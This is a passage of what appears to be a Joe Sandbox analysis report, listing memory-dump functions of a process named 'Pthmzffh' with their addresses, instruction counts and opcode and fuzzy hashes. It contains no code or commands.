                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1ec2532f9ea5ac8b8cf416c9d99c4913de52a5d1335dae74209c4f5ea8ca24d6
                                                                      • Instruction ID: 5ef960e5d3b9883ee0a311ba395952209d9b4e93daab7776a2d8eb6217a86852
                                                                      • Opcode Fuzzy Hash: 1ec2532f9ea5ac8b8cf416c9d99c4913de52a5d1335dae74209c4f5ea8ca24d6
                                                                      • Instruction Fuzzy Hash: D2310E317086186F8721BBA9A45046FBBD6EFC0229340082DE40ADF38ADF34EE0543D7
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A30DD8 Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7327aba63b5232c8a7258188df116d569648d6a3637f8042021cebd3d43b2c9f
                                                                      • Instruction ID: 72d24c2068a248b27420fcc9ad9c3ebffa47214fa0c7f8961074002e55ae31ab
                                                                      • Opcode Fuzzy Hash: 7327aba63b5232c8a7258188df116d569648d6a3637f8042021cebd3d43b2c9f
                                                                      • Instruction Fuzzy Hash: 0F418E30B08704CBC715EFA5D0506AEB7F2FF88304F508929E406AB759EB74AE45DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BAC98 Relevance: .1, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 74c0a781ce0cc462e8d2209e6d2bdc2d60a2075607998172bb1eb831d3f561e4
                                                                      • Instruction ID: 121c8ed25a07d793160aa680468078773c52c18536f3aac997a847ccf7e33894
                                                                      • Opcode Fuzzy Hash: 74c0a781ce0cc462e8d2209e6d2bdc2d60a2075607998172bb1eb831d3f561e4
                                                                      • Instruction Fuzzy Hash: FB316B30B147059FD716DBA8C4506FEBBE6EF85384F404929E406AB355DF70AC49CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A30C30 Relevance: .1, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 696b92fe97c39eaf573ac9f6b281444ed2cb79f30bba2130b1192cf261b0fd2d
                                                                      • Instruction ID: fc405ab0d3dcc4be0766ac0dc1dda097e2291704ce5781a025df6024fa289697
                                                                      • Opcode Fuzzy Hash: 696b92fe97c39eaf573ac9f6b281444ed2cb79f30bba2130b1192cf261b0fd2d
                                                                      • Instruction Fuzzy Hash: C3318034B092098FDB04DFA8D4809AEFBF5EF89351715846AE406EB355E730FD428B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A79D10 Relevance: .1, Instructions: 104COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5364ffc611841c16d929a6641670ff37667e933cd276cb6bf9d344caea4a9ea5
                                                                      • Instruction ID: 581e0fc20aaef1fb00c428484aa24860444632e208fc3e073d90e89deee59ff3
                                                                      • Opcode Fuzzy Hash: 5364ffc611841c16d929a6641670ff37667e933cd276cb6bf9d344caea4a9ea5
                                                                      • Instruction Fuzzy Hash: 97315A323002145FEB149F69D880AAF7BAAEFC9354B14847AEA05CB351CF31DC069751
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BBC40 Relevance: .1, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c9b1a1d6f13d7fa1eae67368a3c5be596f9af51c19b8f3a29617b3731d3fcd32
                                                                      • Instruction ID: 3c1d177575dd22cb4e2ee8c8e277975813f5f99b0e9e1853228d4b7b5e03d02e
                                                                      • Opcode Fuzzy Hash: c9b1a1d6f13d7fa1eae67368a3c5be596f9af51c19b8f3a29617b3731d3fcd32
                                                                      • Instruction Fuzzy Hash: 1E3139722297049FD722DFE5C8407ABB7E5FF84345F01056BD946CB645CB71B8028B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A39B40 Relevance: .1, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57f87f32782fb24aff872108caee1caf6f0e565707cda0c10bea35405a7ea3ee
                                                                      • Instruction ID: 06477428b72c17ec99bce32b7ce16faccab8793345934f17432f68e44b8da540
                                                                      • Opcode Fuzzy Hash: 57f87f32782fb24aff872108caee1caf6f0e565707cda0c10bea35405a7ea3ee
                                                                      • Instruction Fuzzy Hash: E13108B5909246DFC302AF7489904EA3FF5E78375430080EAD541CB362FA381987DB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A70618 Relevance: .1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1b09b54aec9bd59377d84458ffa7965c52ee869e98fbb414d74708053543a939
                                                                      • Instruction ID: cbd88a3db55ff904ae5b0e89ee410353132339f971a749dc13572993edec8def
                                                                      • Opcode Fuzzy Hash: 1b09b54aec9bd59377d84458ffa7965c52ee869e98fbb414d74708053543a939
                                                                      • Instruction Fuzzy Hash: F2312C787046089FCB14CF98C894EAA77F6FB88305F218064EA05EB365D731ED129F61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B5B70 Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89e1660ca8938d932b5b38d43b02c46a77b4ff607fd287c6494e180f0c584cd0
                                                                      • Instruction ID: 66bc71828903fcfeddaebec70d0e777ce51ee4b7df66b3df0be88408d07240dc
                                                                      • Opcode Fuzzy Hash: 89e1660ca8938d932b5b38d43b02c46a77b4ff607fd287c6494e180f0c584cd0
                                                                      • Instruction Fuzzy Hash: 2F317930A14218CBDB05EF98D850AEE37B6FF88341F4104A8E902AF359DB759D15CF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A313D8 Relevance: .1, Instructions: 93COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b7a5c81d4cec3f1ec3e677db11d921e524a4594a10ff5fea8a3f47bacb4532a
                                                                      • Instruction ID: e015e69c2e801c9687f529b4a604bbf8e1b5c6c78c94c4f650a54f18b9c5577e
                                                                      • Opcode Fuzzy Hash: 7b7a5c81d4cec3f1ec3e677db11d921e524a4594a10ff5fea8a3f47bacb4532a
                                                                      • Instruction Fuzzy Hash: 42316BB0B042199FCB05DFA8D840AEEBBF6AF88301F104065E512FB245EB75AD45DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7B500 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71ff988c84e2997d34c44cf094636d0aec118251f29d3623fe8c0e2768baa284
                                                                      • Instruction ID: 1161b846f5ab19e544e06ec88c3ad01ade97a8325677aedc2714ab46b8d5adc8
                                                                      • Opcode Fuzzy Hash: 71ff988c84e2997d34c44cf094636d0aec118251f29d3623fe8c0e2768baa284
                                                                      • Instruction Fuzzy Hash: 2231A4F5E042158FCB20DF65DC805AEB7B1EF88208F01456ADA12E7251EB34F902CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7DAE8 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 538a751439e6e9c1416bd4e52a9ac77d4f40edf44d4c44762fc1e1dbd5f03e28
                                                                      • Instruction ID: 478af64707c9c71d42c16fa57f5072060c151ce36ccdc252fa0b93fddcb51f0c
                                                                      • Opcode Fuzzy Hash: 538a751439e6e9c1416bd4e52a9ac77d4f40edf44d4c44762fc1e1dbd5f03e28
                                                                      • Instruction Fuzzy Hash: 3E315634600705CFDB29AF31D85456ABBB6FF89355B14886DD8528B3A0DF36EC46CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7A6D0 Relevance: .1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a89ac72e5c1923237a270e01d42fd252a0bd9e87964d32b72e8a9653b73b0256
                                                                      • Instruction ID: 67db3d929f60d68253bdb5a7079ba2c9b11a7788785524ef1b630944fe3bb5bb
                                                                      • Opcode Fuzzy Hash: a89ac72e5c1923237a270e01d42fd252a0bd9e87964d32b72e8a9653b73b0256
                                                                      • Instruction Fuzzy Hash: 9E314975E00208EFDB14DFA8D984ADEBBF5BF88314F14846AE811E7260DB30E941DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7B5BE Relevance: .1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae214a560d1abdc464462e4c434427432f595cda016788ac747ae6001da57371
                                                                      • Instruction ID: cf03a1cf98d1af0692dc66c857ef27ee6b360613b3614cfc6594e24c70ec513a
                                                                      • Opcode Fuzzy Hash: ae214a560d1abdc464462e4c434427432f595cda016788ac747ae6001da57371
                                                                      • Instruction Fuzzy Hash: 9931BAB5A002058FCB24CF65D880ABEB7B2FF88308F008526D612D72A1EB74F941CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A72B50 Relevance: .1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d50ce03365ceb26385bfa453a2b5b8ce423e4a3a5a5b75655e58275dceefac61
                                                                      • Instruction ID: 5f16a50ea3a6b558d765f2ea0a2ccda7518756be9056bfb99d662bbdccf29d37
                                                                      • Opcode Fuzzy Hash: d50ce03365ceb26385bfa453a2b5b8ce423e4a3a5a5b75655e58275dceefac61
                                                                      • Instruction Fuzzy Hash: 6F212937B042018BEB246E599C0037F32E7EBE4262F1440B7A507DB288EB39ED419752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BD640 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1535aec74c0f024b2f0c6c1371415d4183c6f58f32b7f469e80ee5020063c411
                                                                      • Instruction ID: 073a02818bf4fe5a63aa2ecf6140664decd7ba3a18c291493e70ba72fbb9b9e0
                                                                      • Opcode Fuzzy Hash: 1535aec74c0f024b2f0c6c1371415d4183c6f58f32b7f469e80ee5020063c411
                                                                      • Instruction Fuzzy Hash: 92213870739205DFCB079EF8A9405E9BBA9EF85390B118263D91ECB28DDA70EC40C791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B5B6B Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c30a41264e8c102eceef9638b52f7782bcf2193b1b03ccd6ce6057b1cdaa7938
                                                                      • Instruction ID: 6211c18617cadde5ba25f2f43157ca6df7a1e38fd1d1c213d8901b2e5e6e1434
                                                                      • Opcode Fuzzy Hash: c30a41264e8c102eceef9638b52f7782bcf2193b1b03ccd6ce6057b1cdaa7938
                                                                      • Instruction Fuzzy Hash: 56319F30A14214CBDB06EF94D454AEE3BB2FF88341F5104A8E902AF389DB759D15CF96
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BAC89 Relevance: .1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 767cd435f1a2c41f69176de280e6d9283325105286d6002ad675fff83353eeab
                                                                      • Instruction ID: 421b3290aeabcc569623cb1f12a62cf43859414ec937442d18f79cf3abe9e7ff
                                                                      • Opcode Fuzzy Hash: 767cd435f1a2c41f69176de280e6d9283325105286d6002ad675fff83353eeab
                                                                      • Instruction Fuzzy Hash: F321D630B146069BD716DBA5C4906EFBBF6EF88384F508829E512AB354DF71AC46CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A363CA Relevance: .1, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 705c680d0f07234df4587d82049647a8d137246cfd5015e291a5073835cf6f09
                                                                      • Instruction ID: ae99064129f383ee0d58b5c25462fe22ed66c3c8e07eb2fedbc686d829dd0284
                                                                      • Opcode Fuzzy Hash: 705c680d0f07234df4587d82049647a8d137246cfd5015e291a5073835cf6f09
                                                                      • Instruction Fuzzy Hash: D6319E34A10209EFCB11EF94E990AAEB7B2FF84305F504025F902EB249DB35E906CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0085D514 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516802347.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_85d000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef786f1048a8020b435d069fee0251252c792dfc1c63eb567ecb85d3f0cbed9d
                                                                      • Instruction ID: a79b2e6884edea650530a0fe684924d9189384934c8d5219fa7af7205edea207
                                                                      • Opcode Fuzzy Hash: ef786f1048a8020b435d069fee0251252c792dfc1c63eb567ecb85d3f0cbed9d
                                                                      • Instruction Fuzzy Hash: 1F214871504344DFCB20DF54D8C0B26BB66FB88319F248568EC068B246D336D85ADBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0085D428 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516802347.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_85d000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0d28cfc3bea507b9b9c9b587ab67fe03b49bba8638cc023c854c54729d6d34a
                                                                      • Instruction ID: 4b725edca04506cb17f7949e68f6ff67f5f41802974bb5c505599978f4348902
                                                                      • Opcode Fuzzy Hash: e0d28cfc3bea507b9b9c9b587ab67fe03b49bba8638cc023c854c54729d6d34a
                                                                      • Instruction Fuzzy Hash: C4216A71104344DFDF20CF50D9C0B26BB69FB94329F24C5A9EC054B246C336E85AC7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7E382 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dfe585bc3dab1b8c61dc05b111b92284467279e15d1b22464bd91c62b384a46c
                                                                      • Instruction ID: d5cd8e13c6a8ec8df17a3c12b545b9e7279578ba1c1f2fa935db87c7105f58a5
                                                                      • Opcode Fuzzy Hash: dfe585bc3dab1b8c61dc05b111b92284467279e15d1b22464bd91c62b384a46c
                                                                      • Instruction Fuzzy Hash: D2217C713042549FDB15CF69CC809AA7BEAEF8A314B0584A6F905CB371CA31EC41DB20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7E390 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5f6880ca14d4bca1d820b5c595a87a1d0a4e878aae2c2ed00aad0136b50647ce
                                                                      • Instruction ID: d88525a22d8f82cd26ffb1ec2412ab0d94b2fc0f1f67084c8d32c82e9a3aebf6
                                                                      • Opcode Fuzzy Hash: 5f6880ca14d4bca1d820b5c595a87a1d0a4e878aae2c2ed00aad0136b50647ce
                                                                      • Instruction Fuzzy Hash: EB216D713041589FDB11CF6ACC809AB7BEAAF8A304B0940A6FD15CB3B1CA35EC51DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B0567 Relevance: .1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b5cd1b9ddfa5f3f8d693394704ed0ccba8aa234b2e872085b5c8172a8bd836eb
                                                                      • Instruction ID: 80ff1773f2cc3c31ea4be5a8e240c670b98145fd267e58f111dcac0ec080fbbd
                                                                      • Opcode Fuzzy Hash: b5cd1b9ddfa5f3f8d693394704ed0ccba8aa234b2e872085b5c8172a8bd836eb
                                                                      • Instruction Fuzzy Hash: DB212774D112489FCB02DFA8D484ADDBBF1FF4A300F5590AAE901AB361DB30AD05CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BBDB8 Relevance: .1, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39e5ecdb93127465adb6c36ba9dd08df039097e98784f14151f65452ae57f7f6
                                                                      • Instruction ID: 2b86cc65aafb52d8f46599d3a6113c400b92cd3d2ff52fa31dff1c297bd06f03
                                                                      • Opcode Fuzzy Hash: 39e5ecdb93127465adb6c36ba9dd08df039097e98784f14151f65452ae57f7f6
                                                                      • Instruction Fuzzy Hash: 27216636A14225AFCB125FD5DC40AFFBBA2EF85394F008415FA466B269C735AC01CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A79C10 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 26020eea9074bf6921de024c7ee89e84b095d16485eab3d62496600ea4d97707
                                                                      • Instruction ID: 2140df871bac108e9c37e2111a66ae3cdc4a973abf91b71c205d00802cb25069
                                                                      • Opcode Fuzzy Hash: 26020eea9074bf6921de024c7ee89e84b095d16485eab3d62496600ea4d97707
                                                                      • Instruction Fuzzy Hash: AC212C75A002099FDF148FA8C844ADE7BB6EF8C324F14452AE815A7390CE759C86CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7B510 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05f9f31c0c76a17f9d09b6457755ed6e0c7c1a41055fb03a2296c4350737439a
                                                                      • Instruction ID: 1bd2f239a5e868cc27520503cc7205800e72cbe70c0ce10d3ff483bf8e64e69f
                                                                      • Opcode Fuzzy Hash: 05f9f31c0c76a17f9d09b6457755ed6e0c7c1a41055fb03a2296c4350737439a
                                                                      • Instruction Fuzzy Hash: D72151B5A006158FCB24DF65D884A6EB7B2FF88318F014529DA12A7355EB70F901CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7A7A5 Relevance: .1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a1d229644443133bf46f57e27c8e81db1ad2c30acfea6133dcb1e2eae6b410de
                                                                      • Instruction ID: 80d8efbc3db80539776c71d1151fe92ed3e64476454a714ad797683876bfc6a0
                                                                      • Opcode Fuzzy Hash: a1d229644443133bf46f57e27c8e81db1ad2c30acfea6133dcb1e2eae6b410de
                                                                      • Instruction Fuzzy Hash: E031C778F01218AFDB14CFA4D994AADBBB6FF49304F148455E801AB360DB34AD42DF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A795A0 Relevance: .1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e9e9eb67e782e0d3179a74ead38f4ff49886e5e4cb2b12472943e3b4184f00c4
                                                                      • Instruction ID: 0357290922522bb21405ff86727578583b3f83404ef373f9aa6adbf8f4e855e7
                                                                      • Opcode Fuzzy Hash: e9e9eb67e782e0d3179a74ead38f4ff49886e5e4cb2b12472943e3b4184f00c4
                                                                      • Instruction Fuzzy Hash: 2B21B370A042019FEB10EBA8E45579E7BEAFB88304F504939D00AEB681DF75AD0687D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B8FB1 Relevance: .1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
